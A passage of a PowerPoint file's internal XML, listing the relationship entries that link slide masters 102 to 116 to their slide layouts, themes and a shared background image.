Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1010.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1001.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1019.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1018.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1017.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1016.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1015.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1014.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1013.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1012.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme102.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1020.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1011.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster103.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1029.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1028.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1027.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1026.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1025.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1024.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1023.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1022.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme103.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1030.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1021.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster104.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1039.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1038.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1037.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1036.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1035.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1034.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1033.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1032.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme104.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1040.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1031.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster105.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1049.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1048.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1047.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1046.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1045.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1044.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1043.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1042.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme105.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1050.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1041.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1059.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1058.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1057.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1056.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1055.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1054.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1053.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1052.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme106.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1060.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1051.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster107.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1069.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1068.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1067.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1066.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1065.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1064.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1063.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1062.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme107.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1070.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1061.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster108.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1079.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1078.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1077.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1076.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1075.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1074.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1073.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1072.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme108.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1080.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1071.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1089.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1088.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1087.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1086.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1085.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1084.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1083.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1082.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme109.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1090.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1081.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout109.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout108.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout107.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout106.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout105.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout104.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout103.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout102.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme11.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout110.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout101.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster110.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1099.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1098.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1097.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1096.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1095.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1094.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1093.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1092.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme110.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1100.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1091.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster111.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1109.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1108.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1107.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1106.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1105.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1104.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1103.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1102.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme111.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1110.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1101.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1119.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1118.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1117.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1116.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1115.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1114.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1113.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1112.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme112.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1120.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1111.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster113.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1129.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1128.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1127.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1126.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1125.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1124.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1123.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1122.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme113.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1130.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1121.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster114.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1139.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1138.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1137.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1136.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1135.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1134.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1133.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1132.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme114.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1140.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1131.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster115.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1149.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1148.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1147.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1146.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1145.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1144.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1143.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1142.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme115.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1150.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1141.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster116.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1159.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1158.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1157.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1156.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1155.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1154.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" 